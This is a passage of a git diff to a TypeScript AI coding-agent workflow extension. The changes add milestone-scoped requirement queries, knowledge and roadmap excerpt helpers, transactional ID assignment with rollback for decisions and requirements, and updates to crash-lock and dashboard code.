+        // Content may be string or array of content blocks — always replace with array
+        return { ...m, content: MASK_CONTENT_BLOCK };
+      }
+      return m;
+    });
+  };
+}
diff --git a/src/resources/extensions/gsd/context-store.ts b/src/resources/extensions/gsd/context-store.ts
index b23f1e855..df938555a 100644
--- a/src/resources/extensions/gsd/context-store.ts
+++ b/src/resources/extensions/gsd/context-store.ts
@@ -15,6 +15,7 @@ export interface DecisionQueryOpts {
 }
 
 export interface RequirementQueryOpts {
+  milestoneId?: string;
   sliceId?: string;
   status?: string;
 }
@@ -67,7 +68,8 @@ export function queryDecisions(opts?: DecisionQueryOpts): Decision[] {
 
 /**
  * Query active (non-superseded) requirements with optional filters.
- * - sliceId: filters where primary_owner LIKE '%sliceId%' OR supporting_slices LIKE '%sliceId%'
+ * - milestoneId: combined with sliceId for precise filtering (e.g. %M005/S01%)
+ * - sliceId: filters where primary_owner LIKE '%pattern%' OR supporting_slices LIKE '%pattern%'
  * - status: filters where status = :status (exact match)
  *
  * Returns [] if DB is not available. Never throws.
@@ -81,9 +83,19 @@ export function queryRequirements(opts?: RequirementQueryOpts): Requirement[] {
     const clauses: string[] = ['superseded_by IS NULL'];
     const params: Record<string, unknown> = {};
 
-    if (opts?.sliceId) {
+    // Combined milestone+slice filtering for precise scoping
+    if (opts?.milestoneId && opts?.sliceId) {
+      // Use combined pattern like %M005/S01% to avoid cross-milestone contamination
+      clauses.push('(primary_owner LIKE :combined_pattern OR supporting_slices LIKE :combined_pattern)');
+      params[':combined_pattern'] = `%${opts.milestoneId}/${opts.sliceId}%`;
+    } else if (opts?.sliceId) {
+      // Slice-only filtering (legacy behavior)
       clauses.push('(primary_owner LIKE :slice_pattern OR supporting_slices LIKE :slice_pattern)');
       params[':slice_pattern'] = `%${opts.sliceId}%`;
+    } else if (opts?.milestoneId) {
+      // Milestone-only filtering
+      clauses.push('(primary_owner LIKE :milestone_pattern OR supporting_slices LIKE :milestone_pattern)');
+      params[':milestone_pattern'] = `%${opts.milestoneId}%`;
     }
 
     if (opts?.status) {
@@ -194,3 +206,156 @@ export function queryArtifact(path: string): string | null {
 export function queryProject(): string | null {
   return queryArtifact('PROJECT.md');
 }
+
+// ─── Knowledge Query ───────────────────────────────────────────────────────
+
+/**
+ * Filter KNOWLEDGE.md sections by keyword matching.
+ * Uses H2 sections, matches keywords case-insensitively against:
+ * 1. Section header text
+ * 2. First paragraph of section content (up to first blank line or next heading)
+ *
+ * Per D020, returns empty string (not null) when no matches found.
+ * This signals "no relevant knowledge" vs "file not found".
+ *
+ * @param content - Full KNOWLEDGE.md content
+ * @param keywords - Keywords to match (case-insensitive)
+ * @returns Concatenated matching sections with H2 headers, or empty string
+ */
+export async function queryKnowledge(content: string, keywords: string[]): Promise<string> {
+  if (!content || keywords.length === 0) return '';
+
+  // Lazy import to avoid circular dependency
+  const { extractAllSections } = await import('./files.js');
+
+  const sections = extractAllSections(content, 2);
+  if (sections.size === 0) return '';
+
+  // Normalize keywords for case-insensitive matching
+  const normalizedKeywords = keywords.map(k => k.toLowerCase());
+
+  const matchingSections: string[] = [];
+
+  for (const [header, body] of sections) {
+    // Extract first paragraph: everything up to first blank line or next heading
+    const firstParagraph = body.split(/\n\s*\n|\n#/)[0] || '';
+
+    // Check if any keyword matches header or first paragraph
+    const headerLower = header.toLowerCase();
+    const paragraphLower = firstParagraph.toLowerCase();
+
+    const matches = normalizedKeywords.some(kw =>
+      headerLower.includes(kw) || paragraphLower.includes(kw)
+    );
+
+    if (matches) {
+      matchingSections.push(`## ${header}\n\n${body}`);
+    }
+  }
+
+  return matchingSections.join('\n\n');
+}
+
+// ─── Roadmap Excerpt Formatter ─────────────────────────────────────────────
+
+/**
+ * Format a minimal roadmap excerpt for prompt injection.
+ * Parses the slice table from roadmap content, extracts:
+ * 1. Header row + separator
+ * 2. Predecessor row (if sliceId depends on one via the Depends column)
+ * 3. Target slice row
+ * 4. Reference directive pointing to full roadmap path
+ *
+ * Per D021, this minimizes injected content while preserving dependency awareness.
+ * Returns empty string if sliceId is not found in the table.
+ * Never throws.
+ *
+ * @param roadmapContent - Full content of the M###-ROADMAP.md file
+ * @param sliceId - Target slice ID (e.g. 'S02')
+ * @param roadmapPath - Optional path for reference directive (defaults to generic)
+ */
+export function formatRoadmapExcerpt(
+  roadmapContent: string,
+  sliceId: string,
+  roadmapPath = 'ROADMAP.md',
+): string {
+  if (!roadmapContent || !sliceId) return '';
+
+  const lines = roadmapContent.split('\n');
+
+  // Find the slice table header: | ID | Slice | ... (case insensitive)
+  let headerIndex = -1;
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i];
+    if (line && /^\s*\|\s*ID\s*\|\s*Slice\s*\|/i.test(line)) {
+      headerIndex = i;
+      break;
+    }
+  }
+
+  if (headerIndex === -1) return '';
+
+  // The separator should be the next line (|---|---|...)
+  const separatorIndex = headerIndex + 1;
+  if (separatorIndex >= lines.length) return '';
+
+  const headerLine = lines[headerIndex];
+  const separatorLine = lines[separatorIndex];
+
+  // Validate separator line looks like |---|---|... (may include : for alignment)
+  if (!separatorLine || !/^\s*\|[\s:\-|]+\|/.test(separatorLine)) return '';
+
+  // Parse table rows after separator
+  interface SliceRow {
+    line: string;
+    id: string;
+    depends: string;
+  }
+
+  const sliceRows: SliceRow[] = [];
+  for (let i = separatorIndex + 1; i < lines.length; i++) {
+    const line = lines[i];
+    if (!line || !line.trim().startsWith('|')) break; // End of table
+
+    // Parse row: | ID | Slice | Risk | Depends | Done | After this |
+    const cells = line.split('|').map(c => c.trim());
+    // cells[0] is empty (before first |), cells[1] is ID, etc.
+    if (cells.length < 5) continue;
+
+    const id = cells[1] || '';
+    const depends = cells[4] || ''; // Depends column (0-indexed: empty, ID, Slice, Risk, Depends, ...)
+
+    sliceRows.push({ line, id, depends });
+  }
+
+  // Find target slice row
+  const targetRow = sliceRows.find(r => r.id === sliceId);
+  if (!targetRow) return '';
+
+  // Find predecessor if target depends on one
+  // Depends column may contain: '—', 'S01', 'S01, S02', etc.
+  let predecessorRow: SliceRow | undefined;
+  const dependsRaw = targetRow.depends;
+  if (dependsRaw && dependsRaw !== '—' && dependsRaw !== '-') {
+    // Extract first dependency (e.g. 'S01' from 'S01, S02')
+    const depMatch = dependsRaw.match(/S\d+/);
+    if (depMatch) {
+      predecessorRow = sliceRows.find(r => r.id === depMatch[0]);
+    }
+  }
+
+  // Build excerpt
+  const excerptLines: string[] = [headerLine!, separatorLine!];
+
+  if (predecessorRow) {
+    excerptLines.push(predecessorRow.line);
+  }
+
+  excerptLines.push(targetRow.line);
+
+  // Add reference directive
+  excerptLines.push('');
+  excerptLines.push(`> See full roadmap: ${roadmapPath}`);
+
+  return excerptLines.join('\n');
+}
diff --git a/src/resources/extensions/gsd/crash-recovery.ts b/src/resources/extensions/gsd/crash-recovery.ts
index 8db786026..1b147fead 100644
--- a/src/resources/extensions/gsd/crash-recovery.ts
+++ b/src/resources/extensions/gsd/crash-recovery.ts
@@ -14,8 +14,7 @@ import { readFileSync, unlinkSync, existsSync } from "node:fs";
 import { join } from "node:path";
 import { gsdRoot } from "./paths.js";
 import { atomicWriteSync } from "./atomic-write.js";
-
-const LOCK_FILE = "auto.lock";
+import { effectiveLockFile } from "./session-lock.js";
 
 export interface LockData {
   pid: number;
@@ -23,13 +22,12 @@ export interface LockData {
   unitType: string;
   unitId: string;
   unitStartedAt: string;
-  completedUnits: number;
   /** Path to the pi session JSONL file that was active when this unit started. */
   sessionFile?: string;
 }
 
 function lockPath(basePath: string): string {
-  return join(gsdRoot(basePath), LOCK_FILE);
+  return join(gsdRoot(basePath), effectiveLockFile());
 }
 
 /** Write or update the lock file with current auto-mode state. */
@@ -37,7 +35,6 @@ export function writeLock(
   basePath: string,
   unitType: string,
   unitId: string,
-  completedUnits: number,
   sessionFile?: string,
 ): void {
   try {
@@ -47,7 +44,6 @@ export function writeLock(
       unitType,
       unitId,
       unitStartedAt: new Date().toISOString(),
-      completedUnits,
       sessionFile,
     };
     const lp = lockPath(basePath);
@@ -79,12 +75,16 @@ export function readCrashLock(basePath: string): LockData | null {
 /**
  * Check whether the process that wrote the lock is still running.
  * Uses `process.kill(pid, 0)` which sends no signal but checks liveness.
- * Returns false if the PID matches our own (recycled PID from a prior run).
+ * Returns true if the PID matches our own — we are the lock holder (#2470).
  */
 export function isLockProcessAlive(lock: LockData): boolean {
   const pid = lock.pid;
   if (!Number.isInteger(pid) || pid <= 0) return false;
-  if (pid === process.pid) return false;
+  // Our own PID means WE hold this lock — we are alive. (#2470)
+  // Callers that need to distinguish "our lock" from "someone else's lock"
+  // (e.g. startAuto checking for a prior crashed session with a recycled PID)
+  // already guard with `crashLock.pid !== process.pid` before calling us.
+  if (pid === process.pid) return true;
   try {
     process.kill(pid, 0);
     return true;
@@ -102,12 +102,11 @@ export function formatCrashInfo(lock: LockData): string {
     `Previous auto-mode session was interrupted.`,
     `  Was executing: ${lock.unitType} (${lock.unitId})`,
     `  Started at: ${lock.unitStartedAt}`,
-    `  Units completed before crash: ${lock.completedUnits}`,
     `  PID: ${lock.pid}`,
   ];
 
   // Add recovery guidance based on what was happening when it crashed
-  if (lock.unitType === "starting" && lock.unitId === "bootstrap" && lock.completedUnits === 0) {
+  if (lock.unitType === "starting" && lock.unitId === "bootstrap") {
     lines.push(`No work was lost. Run /gsd auto to restart.`);
   } else if (lock.unitType.includes("research") || lock.unitType.includes("plan")) {
     lines.push(`The ${lock.unitType} unit may be incomplete. Run /gsd auto to re-run it.`);
diff --git a/src/resources/extensions/gsd/custom-execution-policy.ts b/src/resources/extensions/gsd/custom-execution-policy.ts
index 6912c83f4..656873682 100644
--- a/src/resources/extensions/gsd/custom-execution-policy.ts
+++ b/src/resources/extensions/gsd/custom-execution-policy.ts
@@ -14,6 +14,7 @@
 import type { ExecutionPolicy } from "./execution-policy.js";
 import type { RecoveryAction, CloseoutResult } from "./engine-types.js";
 import { runCustomVerification } from "./custom-verification.js";
+import { parseUnitId } from "./unit-id.js";
 
 export class CustomExecutionPolicy implements ExecutionPolicy {
   private readonly runDir: string;
@@ -48,8 +49,8 @@ export class CustomExecutionPolicy implements ExecutionPolicy {
     unitId: string,
     _context: { basePath: string },
   ): Promise<"continue" | "retry" | "pause"> {
-    const parts = unitId.split("/");
-    const stepId = parts[parts.length - 1];
+    const { milestone, slice, task } = parseUnitId(unitId);
+    const stepId = task ?? slice ?? milestone;
     return runCustomVerification(this.runDir, stepId);
   }
 
diff --git a/src/resources/extensions/gsd/custom-verification.ts b/src/resources/extensions/gsd/custom-verification.ts
index 6c9a28b72..77d76d30e 100644
--- a/src/resources/extensions/gsd/custom-verification.ts
+++ b/src/resources/extensions/gsd/custom-verification.ts
@@ -17,11 +17,13 @@
  * - The frozen DEFINITION.yaml on disk is the single source of truth for step policies.
  */
 
+import { logWarning } from "./workflow-logger.js";
 import { readFileSync, existsSync, statSync } from "node:fs";
 import { join, resolve, sep } from "node:path";
 import { spawnSync } from "node:child_process";
 import type { StepDefinition, VerifyPolicy } from "./definition-loader.js";
 import { readFrozenDefinition } from "./custom-workflow-engine.js";
+import { rewriteCommandWithRtk } from "../shared/rtk.js";
 
 /** Verification outcome type — matches ExecutionPolicy.verify() return type. */
 export type VerificationOutcome = "continue" | "retry" | "pause";
@@ -129,8 +131,8 @@ function handleContentHeuristic(
         if (!new RegExp(verify.pattern).test(content)) {
           return "pause";
         }
-      } catch {
-        // Invalid regex at runtime — treat as verification failure
+      } catch (e) {
+        logWarning("engine", `content-heuristic regex failed: ${(e as Error).message}`);
         return "pause";
       }
     }
@@ -164,7 +166,8 @@ function handleShellCommand(
     return "pause";
   }
 
-  const result = spawnSync("sh", ["-c", verify.command], {
+  const rewrittenCommand = rewriteCommandWithRtk(verify.command);
+  const result = spawnSync("sh", ["-c", rewrittenCommand], {
     cwd: runDir,
     timeout: 30_000,
     encoding: "utf-8",
diff --git a/src/resources/extensions/gsd/custom-workflow-engine.ts b/src/resources/extensions/gsd/custom-workflow-engine.ts
index 49e71a4bd..bcdbc8f4d 100644
--- a/src/resources/extensions/gsd/custom-workflow-engine.ts
+++ b/src/resources/extensions/gsd/custom-workflow-engine.ts
@@ -33,6 +33,7 @@ import {
 } from "./graph.js";
 import { injectContext } from "./context-injector.js";
 import type { WorkflowDefinition, StepDefinition } from "./definition-loader.js";
+import { parseUnitId } from "./unit-id.js";
 
 /** Read and parse the frozen DEFINITION.yaml from a run directory. */
 export function readFrozenDefinition(runDir: string): WorkflowDefinition {
@@ -178,11 +179,13 @@ export class CustomWorkflowEngine implements WorkflowEngine {
     state: EngineState,
     completedStep: CompletedStep,
   ): Promise<ReconcileResult> {
-    const graph = state.raw as WorkflowGraph;
+    // Re-read the graph from disk so we do not overwrite concurrent
+    // workflow edits with a stale in-memory snapshot from deriveState().
+    const graph = readGraph(this.runDir);
 
     // Extract stepId from "<workflowName>/<stepId>"
-    const parts = completedStep.unitId.split("/");
-    const stepId = parts[parts.length - 1];
+    const { milestone, slice, task } = parseUnitId(completedStep.unitId);
+    const stepId = task ?? slice ?? milestone;
 
     const updatedGraph = markStepComplete(graph, stepId);
     writeGraph(this.runDir, updatedGraph);
diff --git a/src/resources/extensions/gsd/dashboard-overlay.ts b/src/resources/extensions/gsd/dashboard-overlay.ts
index a7945398c..37bd547fb 100644
--- a/src/resources/extensions/gsd/dashboard-overlay.ts
+++ b/src/resources/extensions/gsd/dashboard-overlay.ts
@@ -9,7 +9,8 @@
 import type { Theme } from "@gsd/pi-coding-agent";
 import { truncateToWidth, visibleWidth, matchesKey, Key } from "@gsd/pi-tui";
 import { deriveState } from "./state.js";
-import { loadFile, parseRoadmap, parsePlan } from "./files.js";
+import { loadFile } from "./files.js";
+import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js";
 import { resolveMilestoneFile, resolveSliceFile } from "./paths.js";
 import { getAutoDashboardData } from "./auto.js";
 import type { AutoDashboardData } from "./auto-dashboard.js";
@@ -28,6 +29,8 @@ import { runEnvironmentChecks, type EnvironmentCheckResult } from "./doctor-envi
 
 function unitLabel(type: string): string {
   switch (type) {
+    case "discuss-milestone":
+    case "discuss-slice": return "Discuss";
     case "research-milestone": return "Research";
     case "plan-milestone": return "Plan";
     case "research-slice": return "Research";
@@ -98,18 +101,11 @@ export class GSDDashboardOverlay {
     const currentUnit = dashData.currentUnit
       ? `${dashData.currentUnit.type}:${dashData.currentUnit.id}:${dashData.currentUnit.startedAt}`
       : "-";
-    const lastCompleted = dashData.completedUnits.length > 0
-      ? dashData.completedUnits[dashData.completedUnits.length - 1]
-      : null;
-    const completedKey = lastCompleted
-      ? `${dashData.completedUnits.length}:${lastCompleted.type}:${lastCompleted.id}:${lastCompleted.finishedAt}`
-      : "0";
     return [
       base,
       dashData.active ? "1" : "0",
       dashData.paused ? "1" : "0",
       currentUnit,
-      completedKey,
     ].join("|");
   }
 
@@ -159,9 +155,14 @@ export class GSDDashboardOverlay {
 
       const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
       const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
-      if (roadmapContent) {
-        const roadmap = parseRoadmap(roadmapContent);
-        for (const s of roadmap.slices) {
+      // Normalize slices from DB
+      type NormSlice = { id: string; done: boolean; title: string; risk: string };
+      let normSlices: NormSlice[] = [];
+      if (isDbAvailable()) {
+        normSlices = getMilestoneSlices(mid).map(s => ({ id: s.id, done: s.status === "complete", title: s.title, risk: s.risk || "medium" }));
+      }
+
+      for (const s of normSlices) {
           const sliceView: SliceView = {
             id: s.id,
             title: s.title,
@@ -172,19 +173,18 @@ export class GSDDashboardOverlay {
           };
 
           if (sliceView.active) {
-            const planFile = resolveSliceFile(base, mid, s.id, "PLAN");
-            const planContent = planFile ? await loadFile(planFile) : null;
-            if (planContent) {
-              const plan = parsePlan(planContent);
+            // Normalize tasks from DB
+            if (isDbAvailable()) {
+              const dbTasks = getSliceTasks(mid, s.id);
               sliceView.taskProgress = {
-                done: plan.tasks.filter(t => t.done).length,
-                total: plan.tasks.length,
+                done: dbTasks.filter(t => t.status === "complete" || t.status === "done").length,
+                total: dbTasks.length,
               };
-              for (const t of plan.tasks) {
+              for (const t of dbTasks) {
                 sliceView.tasks.push({
                   id: t.id,
                   title: t.title,
-                  done: t.done,
+                  done: t.status === "complete" || t.status === "done",
                   active: state.activeTask?.id === t.id,
                 });
               }
@@ -192,7 +192,6 @@ export class GSDDashboardOverlay {
           }
 
           view.slices.push(sliceView);
-        }
       }
 
       this.milestoneData = view;
@@ -454,49 +453,6 @@ export class GSDDashboardOverlay {
       lines.push(centered(th.fg("dim", "No active milestone.")));
     }
 
-    if (this.dashData.completedUnits.length > 0) {
-      lines.push(blank());
-      lines.push(hr());
-      lines.push(row(th.fg("text", th.bold("Completed"))));
-      lines.push(blank());
-
-      // Build ledger lookup for budget indicators (last entry wins for retries)
-      const ledgerLookup = new Map<string, UnitMetrics>();
-      const currentLedger = getLedger();
-      if (currentLedger) {
-        for (const lu of currentLedger.units) {
-          ledgerLookup.set(`${lu.type}:${lu.id}`, lu);
-        }
-      }
-
-      const recent = [...this.dashData.completedUnits].reverse().slice(0, 10);
-      for (const u of recent) {
-        // Budget indicators from ledger — use warning glyph for pressured units
-        const ledgerEntry = ledgerLookup.get(`${u.type}:${u.id}`);
-        const hadPressure = ledgerEntry?.continueHereFired === true;
-        const hadTruncation = (ledgerEntry?.truncationSections ?? 0) > 0;
-        const unitGlyph = hadPressure
-          ? th.fg(STATUS_COLOR.warning, STATUS_GLYPH.warning)
-          : th.fg(STATUS_COLOR.done, STATUS_GLYPH.done);
-        const left = `  ${unitGlyph} ${th.fg("muted", unitLabel(u.type))} ${th.fg("muted", u.id)}`;
-
-        let budgetMarkers = "";
-        if (hadTruncation) {
-          budgetMarkers += th.fg("warning", ` ▼${ledgerEntry!.truncationSections}`);
-        }
-        if (hadPressure) {
-          budgetMarkers += th.fg("error", " → wrap-up");
-        }
-
-        const right = th.fg("dim", formatDuration(u.finishedAt - u.startedAt));
-        lines.push(row(joinColumns(`${left}${budgetMarkers}`, right, contentWidth)));
-      }
-
-      if (this.dashData.completedUnits.length > 10) {
-        lines.push(row(th.fg("dim", `  ...and ${this.dashData.completedUnits.length - 10} more`)));
-      }
-    }
-
     const ledger = getLedger();
     if (ledger && ledger.units.length > 0) {
       const totals = getProjectTotals(ledger.units);
@@ -603,6 +559,13 @@ export class GSDDashboardOverlay {
       if (cacheRate > 0) {
         lines.push(row(`${th.fg("dim", "cache hit rate:")} ${th.fg("text", `${cacheRate}%`)}`));
       }
+
+      if (this.dashData.rtkEnabled && this.dashData.rtkSavings && this.dashData.rtkSavings.commands > 0) {
+        const rtk = this.dashData.rtkSavings;
+        lines.push(row(
+          `${th.fg("dim", "rtk saved:")} ${th.fg("text", formatTokenCount(rtk.savedTokens))} ${th.fg("dim", `(${Math.round(rtk.savingsPct)}% · ${rtk.commands} cmd${rtk.commands === 1 ? "" : "s"})`)}`,
+        ));
+      }
     }
 
     // Environment health section (#1221) — only show issues
diff --git a/src/resources/extensions/gsd/db-writer.ts b/src/resources/extensions/gsd/db-writer.ts
index 2559d5e04..14bcb75b5 100644
--- a/src/resources/extensions/gsd/db-writer.ts
+++ b/src/resources/extensions/gsd/db-writer.ts
@@ -9,14 +9,68 @@
 // parseDecisionsTable() and parseRequirementsSections() with field fidelity.
 
 import { join, resolve } from 'node:path';
+import { readFileSync, existsSync, statSync } from 'node:fs';
 import type { Decision, Requirement } from './types.js';
 import { resolveGsdRootFile } from './paths.js';
 import { saveFile } from './files.js';
 import { GSDError, GSD_STALE_STATE, GSD_IO_ERROR } from './errors.js';
+import { logWarning, logError } from './workflow-logger.js';
 import { invalidateStateCache } from './state.js';
 import { clearPathCache } from './paths.js';
 import { clearParseCache } from './files.js';
 
+// ─── Freeform Detection ───────────────────────────────────────────────────
+
+/**
+ * Detect whether a DECISIONS.md file is in canonical table format
+ * (generated by generateDecisionsMd).
+ *
+ * Returns true only if the file starts with the canonical header
+ * ("# Decisions Register") that generateDecisionsMd produces.
+ * Files with freeform content — even if they contain an appended
+ * decisions table section — return false so the freeform content
+ * is preserved.
+ */
+export function isDecisionsTableFormat(content: string): boolean {
+  // The canonical format always starts with "# Decisions Register"
+  const firstLine = content.split('\n')[0]?.trim() ?? '';
+  if (firstLine !== '# Decisions Register') return false;
+
+  // Additionally verify the file has the canonical table header
+  return content.includes('| # | When | Scope | Decision | Choice | Rationale | Revisable?');
+}
+
+/**
+ * Generate a minimal decisions table section (header + rows) for appending
+ * to a freeform DECISIONS.md file.
+ */
+function generateDecisionsAppendBlock(decisions: Decision[]): string {
+  const lines: string[] = [];
+  lines.push('');
+  lines.push('---');
+  lines.push('');
+  lines.push('## Decisions Table');
+  lines.push('');
+  lines.push('| # | When | Scope | Decision | Choice | Rationale | Revisable? | Made By |');
+  lines.push('|---|------|-------|----------|--------|-----------|------------|---------|');
+
+  for (const d of decisions) {
+    const cells = [
+      d.id,
+      d.when_context,
+      d.scope,
+      d.decision,
+      d.choice,
+      d.rationale,
+      d.revisable,
+      d.made_by ?? 'agent',
+    ].map(cell => (cell ?? '').replace(/\|/g, '\\|'));
+    lines.push(`| ${cells.join(' | ')} |`);
+  }
+
+  return lines.join('\n') + '\n';
+}
+
 // ─── Markdown Generators ──────────────────────────────────────────────────
 
 /**
@@ -168,11 +222,148 @@ export async function nextDecisionId(): Promise<string> {
     const next = maxNum + 1;
     return `D${String(next).padStart(3, '0')}`;
   } catch (err) {
-    process.stderr.write(`gsd-db: nextDecisionId failed: ${(err as Error).message}\n`);
+    logError('manifest', 'nextDecisionId failed', { fn: 'nextDecisionId', error: String((err as Error).message) });
     return 'D001';
   }
 }
 
+// ─── Next Requirement ID ─────────────────────────────────────────────────
+
+/**
+ * Compute the next requirement ID from the current DB state.
+ * Queries MAX(CAST(SUBSTR(id, 2) AS INTEGER)) from requirements table.
+ * Returns R001 if no requirements exist. Zero-pads to 3 digits.
+ */
+export async function nextRequirementId(): Promise<string> {
+  try {
+    const db = await import('./gsd-db.js');
+    const adapter = db._getAdapter();
+    if (!adapter) return 'R001';
+
+    const row = adapter
+      .prepare('SELECT MAX(CAST(SUBSTR(id, 2) AS INTEGER)) as max_num FROM requirements')
+      .get();
+
+    const maxNum = row ? (row['max_num'] as number | null) : null;
+    if (maxNum == null || isNaN(maxNum)) return 'R001';
+
+    const next = maxNum + 1;
+    return `R${String(next).padStart(3, '0')}`;
+  } catch (err) {
+    logError('manifest', 'nextRequirementId failed', { fn: 'nextRequirementId', error: String((err as Error).message) });
+    return 'R001';
+  }
+}
+
+// ─── Save Requirement to DB + Regenerate Markdown ────────────────────────
+
+export interface SaveRequirementFields {
+  class: string;
+  status?: string;
+  description: string;
+  why: string;
+  source: string;
+  primary_owner?: string;
+  supporting_slices?: string;
+  validation?: string;
+  notes?: string;
+}
+
+/**
+ * Save a new requirement to DB and regenerate REQUIREMENTS.md.
+ * Auto-assigns the next ID via nextRequirementId().
+ *
+ * The ID computation and insert are wrapped in a single transaction
+ * to prevent parallel race conditions (same pattern as saveDecisionToDb).
+ *
+ * Returns the assigned ID.
+ */
+export async function saveRequirementToDb(
+  fields: SaveRequirementFields,
+  basePath: string,
+): Promise<{ id: string }> {
+  try {
+    const db = await import('./gsd-db.js');
+
+    // Atomic ID assignment + insert inside a transaction.
+    const id = db.transaction(() => {
+      const adapter = db._getAdapter();
+      if (!adapter) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+
+      const row = adapter
+        .prepare('SELECT MAX(CAST(SUBSTR(id, 2) AS INTEGER)) as max_num FROM requirements')
+        .get();
+      const maxNum = row ? (row['max_num'] as number | null) : null;
+      const nextId = (maxNum == null || isNaN(maxNum))
+        ? 'R001'
+        : `R${String(maxNum + 1).padStart(3, '0')}`;
+
+      const requirement: Requirement = {
+        id: nextId,
+        class: fields.class,
+        status: fields.status ?? 'active',
+        description: fields.description,
+        why: fields.why,
+        source: fields.source,
+        primary_owner: fields.primary_owner ?? '',
+        supporting_slices: fields.supporting_slices ?? '',
+        validation: fields.validation ?? '',
+        notes: fields.notes ?? '',
+        full_content: '',
+        superseded_by: null,
+      };
+
+      db.upsertRequirement(requirement);
+      return nextId;
+    });
+
+    // Fetch all requirements for full file regeneration
+    const adapter = db._getAdapter();
+    let allRequirements: Requirement[] = [];
+    if (adapter) {
+      const rows = adapter.prepare('SELECT * FROM requirements ORDER BY id').all();
+      allRequirements = rows.map(row => ({
+        id: row['id'] as string,
+        class: row['class'] as string,
+        status: row['status'] as string,
+        description: row['description'] as string,
+        why: row['why'] as string,
+        source: row['source'] as string,
+        primary_owner: row['primary_owner'] as string,
+        supporting_slices: row['supporting_slices'] as string,
+        validation: row['validation'] as string,
+        notes: row['notes'] as string,
+        full_content: row['full_content'] as string,
+        superseded_by: (row['superseded_by'] as string) ?? null,
+      }));
+    }
+
+    const nonSuperseded = allRequirements.filter(r => r.superseded_by == null);
+    const md = generateRequirementsMd(nonSuperseded);
+    const filePath = resolveGsdRootFile(basePath, 'REQUIREMENTS');
+    try {
+      await saveFile(filePath, md);
+    } catch (diskErr) {
+      logError('manifest', 'disk write failed, rolling back DB row', { fn: 'saveRequirementToDb', error: String((diskErr as Error).message) });
+      try {
+        const rollbackAdapter = db._getAdapter();
+        rollbackAdapter?.prepare('DELETE FROM requirements WHERE id = :id').run({ ':id': id });
+      } catch (rollbackErr) {
+        logError('manifest', 'SPLIT BRAIN: disk write failed AND DB rollback failed — DB has orphaned row', { fn: 'saveRequirementToDb', id, error: String((rollbackErr as Error).message) });
+      }
+      throw diskErr;
+    }
+    invalidateStateCache();
+    clearPathCache();
+    clearParseCache();
+
+    return { id };
+  } catch (err) {
+    logError('manifest', 'saveRequirementToDb failed', { fn: 'saveRequirementToDb', error: String((err as Error).message) });
+    throw err;
+  }
+}
+
 // ─── Save Decision to DB + Regenerate Markdown ────────────────────────────
 
 export interface SaveDecisionFields {
@@ -188,6 +379,11 @@ export interface SaveDecisionFields {
 /**
  * Save a new decision to DB and regenerate DECISIONS.md.
  * Auto-assigns the next ID via nextDecisionId().
+ *
+ * The ID computation (SELECT MAX) and insert are wrapped in a single
+ * transaction to prevent parallel tool calls from computing the same ID
+ * and silently overwriting each other (#3326, #3339, #3459).
+ *
  * Returns the assigned ID.
  */
 export async function saveDecisionToDb(
@@ -197,18 +393,33 @@ export async function saveDecisionToDb(
   try {
     const db = await import('./gsd-db.js');
 
-    const id = await nextDecisionId();
+    // Atomic ID assignment + insert inside a transaction to prevent
+    // parallel calls from racing on the same MAX(id) value.
+    const id = db.transaction(() => {
+      const adapter = db._getAdapter();
+      if (!adapter) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
 
-    db.upsertDecision({
-      id,
-      when_context: fields.when_context ?? '',
-      scope: fields.scope,
-      decision: fields.decision,
-      choice: fields.choice,
-      rationale: fields.rationale,
-      revisable: fields.revisable ?? 'Yes',
-      made_by: fields.made_by ?? 'agent',
-      superseded_by: null,
+      const row = adapter
+        .prepare('SELECT MAX(CAST(SUBSTR(id, 2) AS INTEGER)) as max_num FROM decisions')
+        .get();
+      const maxNum = row ? (row['max_num'] as number | null) : null;
+      const nextId = (maxNum == null || isNaN(maxNum))
+        ? 'D001'
+        : `D${String(maxNum + 1).padStart(3, '0')}`;
+
+      db.upsertDecision({
+        id: nextId,
+        when_context: fields.when_context ?? '',
+        scope: fields.scope,
+        decision: fields.decision,
+        choice: fields.choice,
+        rationale: fields.rationale,
+        revisable: fields.revisable ?? 'Yes',
+        made_by: fields.made_by ?? 'agent',
+        superseded_by: null,
+      });
+
+      return nextId;
     });
 
     // Fetch all decisions (including superseded for the full register)
@@ -230,9 +441,59 @@ export async function saveDecisionToDb(
       }));
     }
 
-    const md = generateDecisionsMd(allDecisions);
     const filePath = resolveGsdRootFile(basePath, 'DECISIONS');
-    await saveFile(filePath, md);
+
+    // Check if existing DECISIONS.md has freeform (non-table) content.
+    // If so, preserve that content and append/update the decisions table
+    // at the end instead of overwriting the entire file.
+    let existingContent: string | null = null;
+    if (existsSync(filePath)) {
+      existingContent = readFileSync(filePath, 'utf-8');
+    }
+
+    let md: string;
+    if (existingContent && !isDecisionsTableFormat(existingContent)) {
+      // Freeform content detected — preserve it and append decisions table.
+      // Strip any previously appended decisions table section to avoid duplication.
+      const marker = '---\n\n## Decisions Table';
+      const markerIdx = existingContent.indexOf(marker);
+      const freeformPart = markerIdx >= 0
+        ? existingContent.substring(0, markerIdx).trimEnd()
+        : existingContent.trimEnd();
+      md = freeformPart + '\n' + generateDecisionsAppendBlock(allDecisions);
+    } else {
+      // Table format or no existing file — full regeneration (original behavior)
+      md = generateDecisionsMd(allDecisions);
+    }
+
+    try {
+      await saveFile(filePath, md);
+    } catch (diskErr) {
+      logError('manifest', 'disk write failed, rolling back DB row', { fn: 'saveDecisionToDb', error: String((diskErr as Error).message) });
+      try {
+        adapter?.prepare('DELETE FROM decisions WHERE id = :id').run({ ':id': id });
+      } catch (rollbackErr) {
+        logError('manifest', 'SPLIT BRAIN: disk write failed AND DB rollback failed — DB has orphaned row', { fn: 'saveDecisionToDb', id, error: String((rollbackErr as Error).message) });
+      }
+      throw diskErr;
+    }
+    // #2661: When a decision defers a slice, update the slice status in the DB
+    // so the dispatcher skips it. Without this, STATE.md and DECISIONS.md are
+    // in split-brain: the decision says "deferred" but the state still says
+    // "active", causing auto-mode to keep dispatching the deferred work.
+    try {
+      const sliceRef = extractDeferredSliceRef(fields);
+      if (sliceRef) {
+        db.updateSliceStatus(sliceRef.milestoneId, sliceRef.sliceId, 'deferred');
+      }
+    } catch (deferErr) {
+      // Non-fatal — log but don't fail the decision save
+      logError('manifest', 'failed to update deferred slice status', {
